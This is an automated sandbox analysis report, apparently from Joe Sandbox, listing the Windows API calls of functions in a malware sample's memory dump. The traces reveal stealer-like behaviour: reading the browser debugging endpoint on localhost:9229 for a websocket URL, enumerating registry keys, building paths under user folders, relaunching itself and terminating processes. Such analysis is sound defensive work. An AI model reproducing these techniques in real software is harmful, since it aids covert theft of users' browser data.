                                  • Instruction ID: 5f35c352fedbc79a686343c07df4a372396e5f9c6a49f751317c4bbb1426539e
                                  • Opcode Fuzzy Hash: 1e498a5d99efa4ae4e1b84e897ec1115347e81465c528e41f34166e9a33e171e
                                  • Instruction Fuzzy Hash: B9E12871E11218DFDF16DFA8D894ADEBBB5BF48300F1044AAE509A7281DB349E49CF90
                                  APIs
                                  • memset.MSVCRT ref: 0031D9A1
                                  • memset.MSVCRT ref: 0031D9B3
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0031D9DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031DA0E
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031DA1C
                                  • lstrcat.KERNEL32(?,0102DF10), ref: 0031DA36
                                  • lstrcat.KERNEL32(?,?), ref: 0031DA4A
                                  • lstrcat.KERNEL32(?,0102CB10), ref: 0031DA5E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031DA8E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0031DA95
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031DAFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2367105040-0
                                  • Opcode ID: ebfb8a3a6d81b94518afb410a6d93dfb6d134370df242f2fafb2e061b9a5055f
                                  • Instruction ID: ffd622bdd1be786b37499abd290000746c83e5a4ccd30a554f79b193a3b82ecd
                                  • Opcode Fuzzy Hash: ebfb8a3a6d81b94518afb410a6d93dfb6d134370df242f2fafb2e061b9a5055f
                                  • Instruction Fuzzy Hash: 68B1B1B1D102599FCB16EFA4DC989EE77B9BF49300F044969F906E7250DB309E89CB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030B330
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B37E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B3A9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030B3B1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B3D9
                                  • lstrlen.KERNEL32(00334C50), ref: 0030B450
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B474
                                  • lstrcat.KERNEL32(00000000,00334C50), ref: 0030B480
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B4A9
                                  • lstrlen.KERNEL32(00000000), ref: 0030B52D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B557
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030B55F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B587
                                  • lstrlen.KERNEL32(00334AD4), ref: 0030B5FE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B622
                                  • lstrcat.KERNEL32(00000000,00334AD4), ref: 0030B62E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B65E
                                  • lstrlen.KERNEL32(?), ref: 0030B767
                                  • lstrlen.KERNEL32(?), ref: 0030B776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B79E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 00e46ba033bbf3e5dbc6653125ed67e579b26cc9d96f802874372e13cd5bbf3f
                                  • Instruction ID: 842bc0a0f1b849a6110f3d7bad4a5392641f3e387b9aebddf784a2c40909f484
                                  • Opcode Fuzzy Hash: 00e46ba033bbf3e5dbc6653125ed67e579b26cc9d96f802874372e13cd5bbf3f
                                  • Instruction Fuzzy Hash: E9026370A02205CFCB26DF59D9A8B6AF7B5AF50704F1980A9E4059B3E1DB71DC46DF80
                                  APIs
                                    • Part of subcall function 003271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003271FE
                                  • RegOpenKeyExA.ADVAPI32(?,0102AF50,00000000,00020019,?), ref: 003237BD
                                  • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 003237F7
                                  • wsprintfA.USER32 ref: 00323822
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00323840
                                  • RegCloseKey.ADVAPI32(?), ref: 0032384E
                                  • RegCloseKey.ADVAPI32(?), ref: 00323858
                                  • RegQueryValueExA.ADVAPI32(?,0102DC10,00000000,000F003F,?,?), ref: 003238A1
                                  • lstrlen.KERNEL32(?), ref: 003238B6
                                  • RegQueryValueExA.ADVAPI32(?,0102DE68,00000000,000F003F,?,00000400), ref: 00323927
                                  • RegCloseKey.ADVAPI32(?), ref: 00323972
                                  • RegCloseKey.ADVAPI32(?), ref: 00323989
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 13140697-3278919252
                                  • Opcode ID: 6c045f9686f3aee3a1ccf737e0b3d4d2e6398469126693db7ae3c417420df454
                                  • Instruction ID: 3e01c001248fd937ab5581649787b9cf024b95923141dbdf8ae0372e2ecdba95
                                  • Opcode Fuzzy Hash: 6c045f9686f3aee3a1ccf737e0b3d4d2e6398469126693db7ae3c417420df454
                                  • Instruction Fuzzy Hash: 2E91ADB2900218DFCB11DF94ED84AEEB7B9FB48310F158569F509AB211DB31AE45CF90
                                  APIs
                                  • InternetOpenA.WININET(0032CFEC,00000001,00000000,00000000,00000000), ref: 003090DF
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003090FC
                                  • InternetCloseHandle.WININET(00000000), ref: 00309109
                                  • InternetReadFile.WININET(?,?,?,00000000), ref: 00309166
                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00309197
                                  • InternetCloseHandle.WININET(00000000), ref: 003091A2
                                  • InternetCloseHandle.WININET(00000000), ref: 003091A9
                                  • strlen.MSVCRT ref: 003091BA
                                  • strlen.MSVCRT ref: 003091ED
                                  • strlen.MSVCRT ref: 0030922E
                                  • strlen.MSVCRT ref: 0030924C
                                    • Part of subcall function 00308980: std::_Xinvalid_argument.LIBCPMT ref: 00308996
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 1530259920-2144369209
                                  • Opcode ID: e2f28385d75d5ddfe177599ddfb1ba998a03333748794701a72e03d0a6340cc6
                                  • Instruction ID: 05b9b4b2fc6272e0b71e5fa7aa3880e2a3e47f4a8e8b5dde923e5e593fcc6e40
                                  • Opcode Fuzzy Hash: e2f28385d75d5ddfe177599ddfb1ba998a03333748794701a72e03d0a6340cc6
                                  • Instruction Fuzzy Hash: 8A51E471710209ABDB26DBA8DC85FEEF7F9DB48710F140469F504E7281DBB4AA4887A1
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 003216A1
                                  • lstrcpy.KERNEL32(00000000,0101B310), ref: 003216CC
                                  • lstrlen.KERNEL32(?), ref: 003216D9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003216F6
                                  • lstrcat.KERNEL32(00000000,?), ref: 00321704
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0032172A
                                  • lstrlen.KERNEL32(01029EA8), ref: 0032173F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00321762
                                  • lstrcat.KERNEL32(00000000,01029EA8), ref: 0032176A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321792
                                  • ShellExecuteEx.SHELL32(?), ref: 003217CD
                                  • ExitProcess.KERNEL32 ref: 00321803
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                  • String ID: <
                                  • API String ID: 3579039295-4251816714
                                  • Opcode ID: a3f00bac08a35be7bb98b7ad158cb62bf87f6df23991f29e6fb1bb5648aba32c
                                  • Instruction ID: 98638daca4ee2dc2fdaa96590647a63acd783f17a3ef79a254cefea0b4d2258e
                                  • Opcode Fuzzy Hash: a3f00bac08a35be7bb98b7ad158cb62bf87f6df23991f29e6fb1bb5648aba32c
                                  • Instruction Fuzzy Hash: 8C518571E012299BDB12DFA8DD88A9EB7F9AFA4300F054125F505E7351DF70AE05DB50
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031EFE4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031F012
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0031F026
                                  • lstrlen.KERNEL32(00000000), ref: 0031F035
                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 0031F053
                                  • StrStrA.SHLWAPI(00000000,?), ref: 0031F081
                                  • lstrlen.KERNEL32(?), ref: 0031F094
                                  • lstrlen.KERNEL32(00000000), ref: 0031F0B2
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 0031F0FF
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 0031F13F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$AllocLocal
                                  • String ID: ERROR
                                  • API String ID: 1803462166-2861137601
                                  • Opcode ID: 97d76eacc7c4591a3254e8fb63c9c2c0ab176be941bf6c7edbd49a3c9f1313bd
                                  • Instruction ID: 4e94b0ed9d304a8e151512a6eb633cfa13bd7c51d7e43ecd854301894a0fe059
                                  • Opcode Fuzzy Hash: 97d76eacc7c4591a3254e8fb63c9c2c0ab176be941bf6c7edbd49a3c9f1313bd
                                  • Instruction Fuzzy Hash: 0F517D31A112059FCB27EF78DC99AAF77A5AF58300F064168F84A9F252DF30EC558B90
                                  APIs
                                  • GetEnvironmentVariableA.KERNEL32(01028A20,00539BD8,0000FFFF), ref: 0030A026
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030A053
                                  • lstrlen.KERNEL32(00539BD8), ref: 0030A060
                                  • lstrcpy.KERNEL32(00000000,00539BD8), ref: 0030A08A
                                  • lstrlen.KERNEL32(00334C4C), ref: 0030A095
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030A0B2
                                  • lstrcat.KERNEL32(00000000,00334C4C), ref: 0030A0BE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030A0E4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030A0EF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030A114
                                  • SetEnvironmentVariableA.KERNEL32(01028A20,00000000), ref: 0030A12F
                                  • LoadLibraryA.KERNEL32(0102D2E8), ref: 0030A143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                  • String ID:
                                  • API String ID: 2929475105-0
                                  • Opcode ID: 6cadfd5ca9792f13f96929766b1482b0d7efc3b976a3156729a9c34962b9177f
                                  • Instruction ID: 7f262bf8398d21acfa395b4e3dc0efd8e1fd3cd74cdf48533646278ec7b243ac
                                  • Opcode Fuzzy Hash: 6cadfd5ca9792f13f96929766b1482b0d7efc3b976a3156729a9c34962b9177f
                                  • Instruction Fuzzy Hash: 5D91C370A02F009FD7379FA8EC68A6637A9AB64705F410468F4058B3E1EFB5DD44DB82
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031C8A2
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031C8D1
                                  • lstrlen.KERNEL32(00000000), ref: 0031C8FC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031C932
                                  • StrCmpCA.SHLWAPI(00000000,00334C3C), ref: 0031C943
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: cf700032acffa1bc6c7e8d6e3c708214887524a492145fbbf39f6f14a2c34d59
                                  • Instruction ID: d8e5b4f9cd0e353b257c6204695a4ec7335ea9d9787d9b58c923872307bd157e
                                  • Opcode Fuzzy Hash: cf700032acffa1bc6c7e8d6e3c708214887524a492145fbbf39f6f14a2c34d59
                                  • Instruction Fuzzy Hash: 8261B171E612199BCB17EFB4C888AEE7BB8AF19700F052069E841EB241DB749D458BD0
                                  APIs
                                  • memset.MSVCRT ref: 0032451A
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00314F39), ref: 00324545
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0032454C
                                  • wsprintfW.USER32 ref: 0032455B
                                  • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 003245CA
                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 003245D9
                                  • CloseHandle.KERNEL32(00000000,?,?), ref: 003245E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                  • String ID: 9O1$%hs$9O1
                                  • API String ID: 3729781310-210176786
